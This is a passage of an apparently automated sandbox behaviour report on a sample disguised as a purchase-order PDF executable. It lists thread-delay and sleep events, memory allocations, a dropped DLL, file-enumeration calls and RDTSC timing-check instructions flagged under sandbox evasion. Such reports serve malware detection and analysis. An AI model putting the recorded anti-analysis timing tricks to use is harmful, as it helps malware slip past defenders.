            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeAPI/Special instruction interceptor: Address: 3481FC0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeAPI/Special instruction interceptor: Address: 20A1FC0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeRDTSC instruction interceptor: First address: 3444D45 second address: 3444D45 instructions: 0x00000000 rdtsc 0x00000002 cmp dx, 16E2h 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F00C552BAFEh 0x0000000b test dx, 80D2h 0x00000010 inc ebp 0x00000011 test bl, cl 0x00000013 inc ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeRDTSC instruction interceptor: First address: 2064D45 second address: 2064D45 instructions: 0x00000000 rdtsc 0x00000002 cmp dx, 16E2h 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F00C55A6EFEh 0x0000000b test dx, 80D2h 0x00000010 inc ebp 0x00000011 test bl, cl 0x00000013 inc ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeMemory allocated: 32B70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeMemory allocated: 34B70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598561Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598425Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598298Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598179Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598052Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597810Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597594Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597266Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596389Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596060Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595837Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595603Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595442Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595287Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeWindow / User API: threadDelayed 7593Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeWindow / User API: threadDelayed 2250Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeAPI coverage: 2.5 %
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 1684Thread sleep count: 7593 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 1684Thread sleep count: 2250 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -598561s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -598425s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -598298s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -598179s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -598052s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597810s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -597047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596389s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -596060s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -595837s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -595719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -595603s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -595442s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -595287s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -595156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -595031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -594812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -594703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -594594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -594469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -594359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe TID: 2616Thread sleep time: -594250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405846
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_004027FB FindFirstFileW,3_2_004027FB
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_00406398 FindFirstFileW,FindClose,3_2_00406398
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598561Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598425Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598298Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598179Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 598052Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597810Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597594Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597266Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596389Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 596060Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595837Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595603Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595442Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595287Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeThread delayed: delay time: 594250Jump to behavior
